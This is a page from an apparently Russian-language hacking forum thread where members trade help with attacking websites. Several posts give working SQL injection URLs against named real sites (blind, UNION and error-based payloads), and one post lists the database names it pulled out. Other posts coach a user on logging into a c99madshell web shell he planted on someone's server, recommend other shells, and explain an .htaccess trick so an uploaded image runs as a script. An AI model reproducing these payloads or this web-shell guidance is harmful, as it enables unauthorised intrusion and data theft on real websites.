Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    ладно пасиба, буду пробывать)
     
  2. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Господа, помогите раскрутить эту скулю:

    http://www.xakep.ru/local/include/voter_com.asp?action=add&filedir=2246941'&site=xakep
     
    4 people like this.
  3. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,028
    Likes Received:
    306
    Reputations:
    86
    А может кто-нидь реально рассказать, как самому сделать?
    А то всякие хеведжи не интересуют.
     
    _________________________
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,550
    Likes Received:
    1,252
    Reputations:
    274
    вбей в гугл хеш админа... боян этот сайт ..да и интересного ничего там нет ..только как спортивный интереc
     
  5. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,036
    Likes Received:
    532
    Reputations:
    935
    Code:
    http://www.xakep.ru/local/include/voter_com.asp?action=add&site=xakep&filedir=(2246941)and(substring((db_name()),1,1)='w')
    Code:
    master
    tempdb
    model
    msdb
    forum_integr
    files
    wbanner
    wcounter
    wvote
    www
    wrate
    zbit_net_chat
    catalogs
    test
    forum_gameland
    forum_xakep
    
    Дальше тянуть не стал.
     
    _________________________
  6. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    http://www.candy.ru/detail.asp?PrId=690+and+1=0+union+all+select+null,null,null,null,null,null,null,null,null,table_name,null,null,null+from+sys.user_tables

    чем два дня ждать, пока кто-нибудь расскажет, хотя бы открыл мануал по ораклу и сам бы разбирался
    https://forum.antichat.ru/thread40576.html
     
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    883
    Reputations:
    859
    а втойже папке где шелл, файлик есть ли такой .htaccess
    в котором должно быть прописано
    без этого сервер будет твой png читать как картинку а не как скрипт.
     
    _________________________
  8. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    358
    Likes Received:
    115
    Reputations:
    23
    на шелл есть права на чтение/выполнение?
    какое расширение у шелла? исполнительные ли файлы с этим расширением в .htaccess?
    шелл открывается как на скрине?
     
  9. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    358
    Likes Received:
    115
    Reputations:
    23
    залей нормальный шел https://rdot.org/forum/showthread.php?t=1085.
    А если шелл с расширением .php заливать он работает?
     
  10. Nolen88

    Nolen88 New Member

    Joined:
    26 Jul 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Помогите разобраться с авторизацией в c99madshell - Web shell. Шелл залит по адресу http://site.ru/faq.php
    вот кусок кода из шелла про авторизацию
    $login = "2";
    $pass = "2";
    $md5_pass = "c81e728d9d4c2f636f067f89cc14862c";
    не могу понять правильный синтаксис авторизации, как ввести пароль и логин чтобы шелл пустил? А то приходится удалять эти строки и сидеть без авторизации(. Заранее спасибо за совет.
     
  11. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    883
    Reputations:
    859
    воспользуйся шеллом WSO самый простой и удобный шелл
     
    _________________________
  12. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Стоит phpMyAdmin 2.11.10
    Можно ли как нибудь раскрыть пути?
     
  13. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196

    $login = "root";
    $md5_pass = "c81e728d9d4c2f636f067f89cc14862c";


    логин root
    пасс 2
     
  14. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Как насчет этой скули?

    Как ее крутить?
     
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886

    как то так

    http://bookmail.ru/shop/product/id/4380'+or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+table_name+from+information_schema.tables+limit+0,1),1,64),floor(rand(0)*2)))+and+'1
     
    _________________________
    5 people like this.
  16. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Это круто!
     
  17. Nolen88

    Nolen88 New Member

    Joined:
    26 Jul 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Что то вы или невнимательно меня прочли или одно из двух, я не спрашиваю какой шелл мне лучше использовать потому что залит уже этот. Я не спрашиваю какой логин мне лучше использовать мне нужно объяснить как прописать в строке браузера логин и пароль чтобы шелл меня пустил, вот и все. Шелл лежит по адресу www.site.ru/faq.php
     
  18. AnGeI

    AnGeI Elder - Старейшина

    Joined:
    8 Dec 2008
    Messages:
    396
    Likes Received:
    79
    Reputations:
    16
    [​IMG]

    Нету никаких логинов, только пароль. Он передается через POST, если изменить на GET или REQUEST, то можно использовать: www.site.ru/faq.php?pass=qwerty
     
  19. Nolen88

    Nolen88 New Member

    Joined:
    26 Jul 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Вы издеваетесь? Я говорю шелл уже залит и поздняк метатся, нужно просто понять как он авторизуется, ведь авторизация в нем уже есть, просто я не знаю как в нее войти, c99madshell очень популярный шелл неужели никто им не пользовался?
     
  20. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    677
    Likes Received:
    332
    Reputations:
    120
    $login = "2"; // ЛОГИН (С) К.О.
    $pass = "2"; //ПАРОЛЬ (С) К.О
    $md5_pass = "c81e728d9d4c2f636f067f89cc14862c"; //ХЕШ ПАРОЛЯ (С) К.О.
    Если хеш стоит, то приоритет будет у $md5_pass, а не $pass, т.е. при авторизации будет использоваться захешированный пароль, а не тот который в plaintext.
     
Loading...
Thread Status:
Not open for further replies.